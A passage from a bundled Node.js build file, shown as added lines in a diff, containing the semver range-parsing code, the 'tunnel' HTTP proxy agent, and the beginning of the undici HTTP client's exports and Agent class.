&& + (comp.operator === '<=' || comp.operator === '<')) + var oppositeDirectionsGreaterThan = + cmp(this.semver, '>', comp.semver, options) && + ((this.operator === '<=' 
|| this.operator === '<') && + (comp.operator === '>=' || comp.operator === '>')) + + return sameDirectionIncreasing || sameDirectionDecreasing || + (sameSemVer && differentDirectionsInclusive) || + oppositeDirectionsLessThan || oppositeDirectionsGreaterThan +} + +exports.Range = Range +function Range (range, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (range instanceof Range) { + if (range.loose === !!options.loose && + range.includePrerelease === !!options.includePrerelease) { + return range + } else { + return new Range(range.raw, options) + } + } + + if (range instanceof Comparator) { + return new Range(range.value, options) + } + + if (!(this instanceof Range)) { + return new Range(range, options) + } + + this.options = options + this.loose = !!options.loose + this.includePrerelease = !!options.includePrerelease + + // First reduce all whitespace as much as possible so we do not have to rely + // on potentially slow regexes like \s*. This is then stored and used for + // future error messages as well. + this.raw = range + .trim() + .split(/\s+/) + .join(' ') + + // First, split based on boolean or || + this.set = this.raw.split('||').map(function (range) { + return this.parseRange(range.trim()) + }, this).filter(function (c) { + // throw out any that are not relevant for whatever reason + return c.length + }) + + if (!this.set.length) { + throw new TypeError('Invalid SemVer Range: ' + this.raw) + } + + this.format() +} + +Range.prototype.format = function () { + this.range = this.set.map(function (comps) { + return comps.join(' ').trim() + }).join('||').trim() + return this.range +} + +Range.prototype.toString = function () { + return this.range +} + +Range.prototype.parseRange = function (range) { + var loose = this.options.loose + // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` + var hr = loose ? 
safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] + range = range.replace(hr, hyphenReplace) + debug('hyphen replace', range) + // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` + range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) + debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) + + // `~ 1.2.3` => `~1.2.3` + range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) + + // `^ 1.2.3` => `^1.2.3` + range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) + + // normalize spaces + range = range.split(/\s+/).join(' ') + + // At this point, the range is completely trimmed and + // ready to be split into comparators. + + var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var set = range.split(' ').map(function (comp) { + return parseComparator(comp, this.options) + }, this).join(' ').split(/\s+/) + if (this.options.loose) { + // in loose mode, throw out any that are not valid comparators + set = set.filter(function (comp) { + return !!comp.match(compRe) + }) + } + set = set.map(function (comp) { + return new Comparator(comp, this.options) + }, this) + + return set +} + +Range.prototype.intersects = function (range, options) { + if (!(range instanceof Range)) { + throw new TypeError('a Range is required') + } + + return this.set.some(function (thisComparators) { + return ( + isSatisfiable(thisComparators, options) && + range.set.some(function (rangeComparators) { + return ( + isSatisfiable(rangeComparators, options) && + thisComparators.every(function (thisComparator) { + return rangeComparators.every(function (rangeComparator) { + return thisComparator.intersects(rangeComparator, options) + }) + }) + ) + }) + ) + }) +} + +// take a set of comparators and determine whether there +// exists a version which can satisfy it +function isSatisfiable (comparators, options) { + var result = true + var remainingComparators = comparators.slice() + var testComparator = remainingComparators.pop() + + while (result && 
remainingComparators.length) { + result = remainingComparators.every(function (otherComparator) { + return testComparator.intersects(otherComparator, options) + }) + + testComparator = remainingComparators.pop() + } + + return result +} + +// Mostly just for testing and legacy API reasons +exports.toComparators = toComparators +function toComparators (range, options) { + return new Range(range, options).set.map(function (comp) { + return comp.map(function (c) { + return c.value + }).join(' ').trim().split(' ') + }) +} + +// comprised of xranges, tildes, stars, and gtlt's at this point. +// already replaced the hyphen ranges +// turn into a set of JUST comparators. +function parseComparator (comp, options) { + debug('comp', comp, options) + comp = replaceCarets(comp, options) + debug('caret', comp) + comp = replaceTildes(comp, options) + debug('tildes', comp) + comp = replaceXRanges(comp, options) + debug('xrange', comp) + comp = replaceStars(comp, options) + debug('stars', comp) + return comp +} + +function isX (id) { + return !id || id.toLowerCase() === 'x' || id === '*' +} + +// ~, ~> --> * (any, kinda silly) +// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 +// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 +// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 +// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 +// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 +function replaceTildes (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceTilde(comp, options) + }).join(' ') +} + +function replaceTilde (comp, options) { + var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] + return comp.replace(r, function (_, M, m, p, pr) { + debug('tilde', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + // ~1.2 == >=1.2.0 <1.3.0 + ret = '>=' + M + '.' + m + '.0 <' + M + '.' 
+ (+m + 1) + '.0' + } else if (pr) { + debug('replaceTilde pr', pr) + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } else { + // ~1.2.3 == >=1.2.3 <1.3.0 + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + + debug('tilde return', ret) + return ret + }) +} + +// ^ --> * (any, kinda silly) +// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 +// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 +// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 +// ^1.2.3 --> >=1.2.3 <2.0.0 +// ^1.2.0 --> >=1.2.0 <2.0.0 +function replaceCarets (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceCaret(comp, options) + }).join(' ') +} + +function replaceCaret (comp, options) { + debug('caret', comp, options) + var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] + return comp.replace(r, function (_, M, m, p, pr) { + debug('caret', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + if (M === '0') { + ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' + } else { + ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' + } + } else if (pr) { + debug('replaceCaret pr', pr) + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + (+M + 1) + '.0.0' + } + } else { + debug('no pr') + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' 
+ p + + ' <' + (+M + 1) + '.0.0' + } + } + + debug('caret return', ret) + return ret + }) +} + +function replaceXRanges (comp, options) { + debug('replaceXRanges', comp, options) + return comp.split(/\s+/).map(function (comp) { + return replaceXRange(comp, options) + }).join(' ') +} + +function replaceXRange (comp, options) { + comp = comp.trim() + var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] + return comp.replace(r, function (ret, gtlt, M, m, p, pr) { + debug('xRange', comp, ret, gtlt, M, m, p, pr) + var xM = isX(M) + var xm = xM || isX(m) + var xp = xm || isX(p) + var anyX = xp + + if (gtlt === '=' && anyX) { + gtlt = '' + } + + // if we're including prereleases in the match, then we need + // to fix this to -0, the lowest possible prerelease value + pr = options.includePrerelease ? '-0' : '' + + if (xM) { + if (gtlt === '>' || gtlt === '<') { + // nothing is allowed + ret = '<0.0.0-0' + } else { + // nothing is forbidden + ret = '*' + } + } else if (gtlt && anyX) { + // we know patch is an x, because we have any x at all. + // replace X with 0 + if (xm) { + m = 0 + } + p = 0 + + if (gtlt === '>') { + // >1 => >=2.0.0 + // >1.2 => >=1.3.0 + // >1.2.3 => >= 1.2.4 + gtlt = '>=' + if (xm) { + M = +M + 1 + m = 0 + p = 0 + } else { + m = +m + 1 + p = 0 + } + } else if (gtlt === '<=') { + // <=0.7.x is actually <0.8.0, since any 0.7.x should + // pass. Similarly, <=7.x is actually <8.0.0, etc. + gtlt = '<' + if (xm) { + M = +M + 1 + } else { + m = +m + 1 + } + } + + ret = gtlt + M + '.' + m + '.' + p + pr + } else if (xm) { + ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr + } else if (xp) { + ret = '>=' + M + '.' + m + '.0' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + pr + } + + debug('xRange return', ret) + + return ret + }) +} + +// Because * is AND-ed with everything else in the comparator, +// and '' means "any version", just remove the *s entirely. 
+function replaceStars (comp, options) { + debug('replaceStars', comp, options) + // Looseness is ignored here. star is always as loose as it gets! + return comp.trim().replace(safeRe[t.STAR], '') +} + +// This function is passed to string.replace(re[t.HYPHENRANGE]) +// M, m, patch, prerelease, build +// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 +// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do +// 1.2 - 3.4 => >=1.2.0 <3.5.0 +function hyphenReplace ($0, + from, fM, fm, fp, fpr, fb, + to, tM, tm, tp, tpr, tb) { + if (isX(fM)) { + from = '' + } else if (isX(fm)) { + from = '>=' + fM + '.0.0' + } else if (isX(fp)) { + from = '>=' + fM + '.' + fm + '.0' + } else { + from = '>=' + from + } + + if (isX(tM)) { + to = '' + } else if (isX(tm)) { + to = '<' + (+tM + 1) + '.0.0' + } else if (isX(tp)) { + to = '<' + tM + '.' + (+tm + 1) + '.0' + } else if (tpr) { + to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr + } else { + to = '<=' + to + } + + return (from + ' ' + to).trim() +} + +// if ANY of the sets match ALL of its comparators, then pass +Range.prototype.test = function (version) { + if (!version) { + return false + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + for (var i = 0; i < this.set.length; i++) { + if (testSet(this.set[i], version, this.options)) { + return true + } + } + return false +} + +function testSet (set, version, options) { + for (var i = 0; i < set.length; i++) { + if (!set[i].test(version)) { + return false + } + } + + if (version.prerelease.length && !options.includePrerelease) { + // Find the set of versions that are allowed to have prereleases + // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 + // That should allow `1.2.3-pr.2` to pass. + // However, `1.2.4-alpha.notready` should NOT be allowed, + // even though it's within the range set by the comparators. 
+ for (i = 0; i < set.length; i++) { + debug(set[i].semver) + if (set[i].semver === ANY) { + continue + } + + if (set[i].semver.prerelease.length > 0) { + var allowed = set[i].semver + if (allowed.major === version.major && + allowed.minor === version.minor && + allowed.patch === version.patch) { + return true + } + } + } + + // Version has a -pre, but it's not one of the ones we like. + return false + } + + return true +} + +exports.satisfies = satisfies +function satisfies (version, range, options) { + try { + range = new Range(range, options) + } catch (er) { + return false + } + return range.test(version) +} + +exports.maxSatisfying = maxSatisfying +function maxSatisfying (versions, range, options) { + var max = null + var maxSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!max || maxSV.compare(v) === -1) { + // compare(max, v, true) + max = v + maxSV = new SemVer(max, options) + } + } + }) + return max +} + +exports.minSatisfying = minSatisfying +function minSatisfying (versions, range, options) { + var min = null + var minSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!min || minSV.compare(v) === 1) { + // compare(min, v, true) + min = v + minSV = new SemVer(min, options) + } + } + }) + return min +} + +exports.minVersion = minVersion +function minVersion (range, loose) { + range = new Range(range, loose) + + var minver = new SemVer('0.0.0') + if (range.test(minver)) { + return minver + } + + minver = new SemVer('0.0.0-0') + if (range.test(minver)) { + return minver + } + + minver = null + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + comparators.forEach(function (comparator) { + // Clone to avoid manipulating the comparator's 
semver object. + var compver = new SemVer(comparator.semver.version) + switch (comparator.operator) { + case '>': + if (compver.prerelease.length === 0) { + compver.patch++ + } else { + compver.prerelease.push(0) + } + compver.raw = compver.format() + /* fallthrough */ + case '': + case '>=': + if (!minver || gt(minver, compver)) { + minver = compver + } + break + case '<': + case '<=': + /* Ignore maximum versions */ + break + /* istanbul ignore next */ + default: + throw new Error('Unexpected operation: ' + comparator.operator) + } + }) + } + + if (minver && range.test(minver)) { + return minver + } + + return null +} + +exports.validRange = validRange +function validRange (range, options) { + try { + // Return '*' instead of '' so that truthiness works. + // This will throw if it's invalid anyway + return new Range(range, options).range || '*' + } catch (er) { + return null + } +} + +// Determine if version is less than all the versions possible in the range +exports.ltr = ltr +function ltr (version, range, options) { + return outside(version, range, '<', options) +} + +// Determine if version is greater than all the versions possible in the range. +exports.gtr = gtr +function gtr (version, range, options) { + return outside(version, range, '>', options) +} + +exports.outside = outside +function outside (version, range, hilo, options) { + version = new SemVer(version, options) + range = new Range(range, options) + + var gtfn, ltefn, ltfn, comp, ecomp + switch (hilo) { + case '>': + gtfn = gt + ltefn = lte + ltfn = lt + comp = '>' + ecomp = '>=' + break + case '<': + gtfn = lt + ltefn = gte + ltfn = gt + comp = '<' + ecomp = '<=' + break + default: + throw new TypeError('Must provide a hilo val of "<" or ">"') + } + + // If it satisifes the range it is not outside + if (satisfies(version, range, options)) { + return false + } + + // From now on, variable terms are as if we're in "gtr" mode. + // but note that everything is flipped for the "ltr" function. 
+ + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + var high = null + var low = null + + comparators.forEach(function (comparator) { + if (comparator.semver === ANY) { + comparator = new Comparator('>=0.0.0') + } + high = high || comparator + low = low || comparator + if (gtfn(comparator.semver, high.semver, options)) { + high = comparator + } else if (ltfn(comparator.semver, low.semver, options)) { + low = comparator + } + }) + + // If the edge version comparator has a operator then our version + // isn't outside it + if (high.operator === comp || high.operator === ecomp) { + return false + } + + // If the lowest version comparator has an operator and our version + // is less than it then it isn't higher than the range + if ((!low.operator || low.operator === comp) && + ltefn(version, low.semver)) { + return false + } else if (low.operator === ecomp && ltfn(version, low.semver)) { + return false + } + } + return true +} + +exports.prerelease = prerelease +function prerelease (version, options) { + var parsed = parse(version, options) + return (parsed && parsed.prerelease.length) ? parsed.prerelease : null +} + +exports.intersects = intersects +function intersects (r1, r2, options) { + r1 = new Range(r1, options) + r2 = new Range(r2, options) + return r1.intersects(r2) +} + +exports.coerce = coerce +function coerce (version, options) { + if (version instanceof SemVer) { + return version + } + + if (typeof version === 'number') { + version = String(version) + } + + if (typeof version !== 'string') { + return null + } + + options = options || {} + + var match = null + if (!options.rtl) { + match = version.match(safeRe[t.COERCE]) + } else { + // Find the right-most coercible string that does not share + // a terminus with a more left-ward coercible string. 
+ // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' + // + // Walk through the string checking with a /g regexp + // Manually set the index so as to pick up overlapping matches. + // Stop when we get a match that ends at the string end, since no + // coercible string can be more right-ward without the same terminus. + var next + while ((next = safeRe[t.COERCERTL].exec(version)) && + (!match || match.index + match[0].length !== version.length) + ) { + if (!match || + next.index + next[0].length !== match.index + match[0].length) { + match = next + } + safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length + } + // leave it in a clean state + safeRe[t.COERCERTL].lastIndex = -1 + } + + if (match === null) { + return null + } + + return parse(match[2] + + '.' + (match[3] || '0') + + '.' + (match[4] || '0'), options) +} + + +/***/ }), + +/***/ 4294: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +module.exports = __nccwpck_require__(4219); + + +/***/ }), + +/***/ 4219: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +var net = __nccwpck_require__(1808); +var tls = __nccwpck_require__(4404); +var http = __nccwpck_require__(3685); +var https = __nccwpck_require__(5687); +var events = __nccwpck_require__(2361); +var assert = __nccwpck_require__(9491); +var util = __nccwpck_require__(3837); + + +exports.httpOverHttp = httpOverHttp; +exports.httpsOverHttp = httpsOverHttp; +exports.httpOverHttps = httpOverHttps; +exports.httpsOverHttps = httpsOverHttps; + + +function httpOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + return agent; +} + +function httpsOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + +function httpOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = 
https.request; + return agent; +} + +function httpsOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = https.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + + +function TunnelingAgent(options) { + var self = this; + self.options = options || {}; + self.proxyOptions = self.options.proxy || {}; + self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; + self.requests = []; + self.sockets = []; + + self.on('free', function onFree(socket, host, port, localAddress) { + var options = toOptions(host, port, localAddress); + for (var i = 0, len = self.requests.length; i < len; ++i) { + var pending = self.requests[i]; + if (pending.host === options.host && pending.port === options.port) { + // Detect the request to connect same origin server, + // reuse the connection. + self.requests.splice(i, 1); + pending.request.onSocket(socket); + return; + } + } + socket.destroy(); + self.removeSocket(socket); + }); +} +util.inherits(TunnelingAgent, events.EventEmitter); + +TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { + var self = this; + var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); + + if (self.sockets.length >= this.maxSockets) { + // We are over limit so we'll add it to the queue. + self.requests.push(options); + return; + } + + // If we are under maxSockets create a new one. 
+ self.createSocket(options, function(socket) { + socket.on('free', onFree); + socket.on('close', onCloseOrRemove); + socket.on('agentRemove', onCloseOrRemove); + req.onSocket(socket); + + function onFree() { + self.emit('free', socket, options); + } + + function onCloseOrRemove(err) { + self.removeSocket(socket); + socket.removeListener('free', onFree); + socket.removeListener('close', onCloseOrRemove); + socket.removeListener('agentRemove', onCloseOrRemove); + } + }); +}; + +TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { + var self = this; + var placeholder = {}; + self.sockets.push(placeholder); + + var connectOptions = mergeOptions({}, self.proxyOptions, { + method: 'CONNECT', + path: options.host + ':' + options.port, + agent: false, + headers: { + host: options.host + ':' + options.port + } + }); + if (options.localAddress) { + connectOptions.localAddress = options.localAddress; + } + if (connectOptions.proxyAuth) { + connectOptions.headers = connectOptions.headers || {}; + connectOptions.headers['Proxy-Authorization'] = 'Basic ' + + new Buffer(connectOptions.proxyAuth).toString('base64'); + } + + debug('making CONNECT request'); + var connectReq = self.request(connectOptions); + connectReq.useChunkedEncodingByDefault = false; // for v0.6 + connectReq.once('response', onResponse); // for v0.6 + connectReq.once('upgrade', onUpgrade); // for v0.6 + connectReq.once('connect', onConnect); // for v0.7 or later + connectReq.once('error', onError); + connectReq.end(); + + function onResponse(res) { + // Very hacky. This is necessary to avoid http-parser leaks. + res.upgrade = true; + } + + function onUpgrade(res, socket, head) { + // Hacky. 
+ process.nextTick(function() { + onConnect(res, socket, head); + }); + } + + function onConnect(res, socket, head) { + connectReq.removeAllListeners(); + socket.removeAllListeners(); + + if (res.statusCode !== 200) { + debug('tunneling socket could not be established, statusCode=%d', + res.statusCode); + socket.destroy(); + var error = new Error('tunneling socket could not be established, ' + + 'statusCode=' + res.statusCode); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + if (head.length > 0) { + debug('got illegal response body from proxy'); + socket.destroy(); + var error = new Error('got illegal response body from proxy'); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + debug('tunneling connection has established'); + self.sockets[self.sockets.indexOf(placeholder)] = socket; + return cb(socket); + } + + function onError(cause) { + connectReq.removeAllListeners(); + + debug('tunneling socket could not be established, cause=%s\n', + cause.message, cause.stack); + var error = new Error('tunneling socket could not be established, ' + + 'cause=' + cause.message); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + } +}; + +TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { + var pos = this.sockets.indexOf(socket) + if (pos === -1) { + return; + } + this.sockets.splice(pos, 1); + + var pending = this.requests.shift(); + if (pending) { + // If we have pending requests and a socket gets closed a new one + // needs to be created to take over in the pool for the one that closed. 
+ this.createSocket(pending, function(socket) { + pending.request.onSocket(socket); + }); + } +}; + +function createSecureSocket(options, cb) { + var self = this; + TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { + var hostHeader = options.request.getHeader('host'); + var tlsOptions = mergeOptions({}, self.options, { + socket: socket, + servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host + }); + + // 0 is dummy port for v0.6 + var secureSocket = tls.connect(0, tlsOptions); + self.sockets[self.sockets.indexOf(socket)] = secureSocket; + cb(secureSocket); + }); +} + + +function toOptions(host, port, localAddress) { + if (typeof host === 'string') { // since v0.10 + return { + host: host, + port: port, + localAddress: localAddress + }; + } + return host; // for v0.11 or later +} + +function mergeOptions(target) { + for (var i = 1, len = arguments.length; i < len; ++i) { + var overrides = arguments[i]; + if (typeof overrides === 'object') { + var keys = Object.keys(overrides); + for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { + var k = keys[j]; + if (overrides[k] !== undefined) { + target[k] = overrides[k]; + } + } + } + } + return target; +} + + +var debug; +if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { + debug = function() { + var args = Array.prototype.slice.call(arguments); + if (typeof args[0] === 'string') { + args[0] = 'TUNNEL: ' + args[0]; + } else { + args.unshift('TUNNEL:'); + } + console.error.apply(console, args); + } +} else { + debug = function() {}; +} +exports.debug = debug; // for test + + +/***/ }), + +/***/ 1773: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Client = __nccwpck_require__(3598) +const Dispatcher = __nccwpck_require__(412) +const errors = __nccwpck_require__(8045) +const Pool = __nccwpck_require__(4634) +const BalancedPool = __nccwpck_require__(7931) +const Agent = __nccwpck_require__(7890) +const util 
= __nccwpck_require__(3983) +const { InvalidArgumentError } = errors +const api = __nccwpck_require__(4059) +const buildConnector = __nccwpck_require__(2067) +const MockClient = __nccwpck_require__(8687) +const MockAgent = __nccwpck_require__(6771) +const MockPool = __nccwpck_require__(6193) +const mockErrors = __nccwpck_require__(888) +const ProxyAgent = __nccwpck_require__(7858) +const RetryHandler = __nccwpck_require__(2286) +const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) +const DecoratorHandler = __nccwpck_require__(6930) +const RedirectHandler = __nccwpck_require__(2860) +const createRedirectInterceptor = __nccwpck_require__(8861) + +let hasCrypto +try { + __nccwpck_require__(6113) + hasCrypto = true +} catch { + hasCrypto = false +} + +Object.assign(Dispatcher.prototype, api) + +module.exports.Dispatcher = Dispatcher +module.exports.Client = Client +module.exports.Pool = Pool +module.exports.BalancedPool = BalancedPool +module.exports.Agent = Agent +module.exports.ProxyAgent = ProxyAgent +module.exports.RetryHandler = RetryHandler + +module.exports.DecoratorHandler = DecoratorHandler +module.exports.RedirectHandler = RedirectHandler +module.exports.createRedirectInterceptor = createRedirectInterceptor + +module.exports.buildConnector = buildConnector +module.exports.errors = errors + +function makeDispatcher (fn) { + return (url, opts, handler) => { + if (typeof opts === 'function') { + handler = opts + opts = null + } + + if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { + throw new InvalidArgumentError('invalid url') + } + + if (opts != null && typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (opts && opts.path != null) { + if (typeof opts.path !== 'string') { + throw new InvalidArgumentError('invalid opts.path') + } + + let path = opts.path + if (!opts.path.startsWith('/')) { + path = `/${path}` + } + + url = new 
URL(util.parseOrigin(url).origin + path) + } else { + if (!opts) { + opts = typeof url === 'object' ? url : {} + } + + url = util.parseURL(url) + } + + const { agent, dispatcher = getGlobalDispatcher() } = opts + + if (agent) { + throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') + } + + return fn.call(dispatcher, { + ...opts, + origin: url.origin, + path: url.search ? `${url.pathname}${url.search}` : url.pathname, + method: opts.method || (opts.body ? 'PUT' : 'GET') + }, handler) + } +} + +module.exports.setGlobalDispatcher = setGlobalDispatcher +module.exports.getGlobalDispatcher = getGlobalDispatcher + +if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { + let fetchImpl = null + module.exports.fetch = async function fetch (resource) { + if (!fetchImpl) { + fetchImpl = (__nccwpck_require__(4881).fetch) + } + + try { + return await fetchImpl(...arguments) + } catch (err) { + if (typeof err === 'object') { + Error.captureStackTrace(err, this) + } + + throw err + } + } + module.exports.Headers = __nccwpck_require__(554).Headers + module.exports.Response = __nccwpck_require__(7823).Response + module.exports.Request = __nccwpck_require__(8359).Request + module.exports.FormData = __nccwpck_require__(2015).FormData + module.exports.File = __nccwpck_require__(8511).File + module.exports.FileReader = __nccwpck_require__(1446).FileReader + + const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) + + module.exports.setGlobalOrigin = setGlobalOrigin + module.exports.getGlobalOrigin = getGlobalOrigin + + const { CacheStorage } = __nccwpck_require__(7907) + const { kConstruct } = __nccwpck_require__(9174) + + // Cache & CacheStorage are tightly coupled with fetch. Even if it may run + // in an older version of Node, it doesn't have any use without fetch. 
+ module.exports.caches = new CacheStorage(kConstruct) +} + +if (util.nodeMajor >= 16) { + const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) + + module.exports.deleteCookie = deleteCookie + module.exports.getCookies = getCookies + module.exports.getSetCookies = getSetCookies + module.exports.setCookie = setCookie + + const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) + + module.exports.parseMIMEType = parseMIMEType + module.exports.serializeAMimeType = serializeAMimeType +} + +if (util.nodeMajor >= 18 && hasCrypto) { + const { WebSocket } = __nccwpck_require__(4284) + + module.exports.WebSocket = WebSocket +} + +module.exports.request = makeDispatcher(api.request) +module.exports.stream = makeDispatcher(api.stream) +module.exports.pipeline = makeDispatcher(api.pipeline) +module.exports.connect = makeDispatcher(api.connect) +module.exports.upgrade = makeDispatcher(api.upgrade) + +module.exports.MockClient = MockClient +module.exports.MockPool = MockPool +module.exports.MockAgent = MockAgent +module.exports.mockErrors = mockErrors + + +/***/ }), + +/***/ 7890: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) +const DispatcherBase = __nccwpck_require__(4839) +const Pool = __nccwpck_require__(4634) +const Client = __nccwpck_require__(3598) +const util = __nccwpck_require__(3983) +const createRedirectInterceptor = __nccwpck_require__(8861) +const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() + +const kOnConnect = Symbol('onConnect') +const kOnDisconnect = Symbol('onDisconnect') +const kOnConnectionError = Symbol('onConnectionError') +const kMaxRedirections = Symbol('maxRedirections') +const kOnDrain = Symbol('onDrain') +const kFactory = Symbol('factory') +const kFinalizer = Symbol('finalizer') 
+const kOptions = Symbol('options') + +function defaultFactory (origin, opts) { + return opts && opts.connections === 1 + ? new Client(origin, opts) + : new Pool(origin, opts) +} + +class Agent extends DispatcherBase { + constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { + super() + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (connect && typeof connect !== 'function') { + connect = { ...connect } + } + + this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) + ? options.interceptors.Agent + : [createRedirectInterceptor({ maxRedirections })] + + this[kOptions] = { ...util.deepClone(options), connect } + this[kOptions].interceptors = options.interceptors + ? 
{ ...options.interceptors } + : undefined + this[kMaxRedirections] = maxRedirections + this[kFactory] = factory + this[kClients] = new Map() + this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { + const ref = this[kClients].get(key) + if (ref !== undefined && ref.deref() === undefined) { + this[kClients].delete(key) + } + }) + + const agent = this + + this[kOnDrain] = (origin, targets) => { + agent.emit('drain', origin, [agent, ...targets]) + } + + this[kOnConnect] = (origin, targets) => { + agent.emit('connect', origin, [agent, ...targets]) + } + + this[kOnDisconnect] = (origin, targets, err) => { + agent.emit('disconnect', origin, [agent, ...targets], err) + } + + this[kOnConnectionError] = (origin, targets, err) => { + agent.emit('connectionError', origin, [agent, ...targets], err) + } + } + + get [kRunning] () { + let ret = 0 + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore next: gc is undeterministic */ + if (client) { + ret += client[kRunning] + } + } + return ret + } + + [kDispatch] (opts, handler) { + let key + if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { + key = String(opts.origin) + } else { + throw new 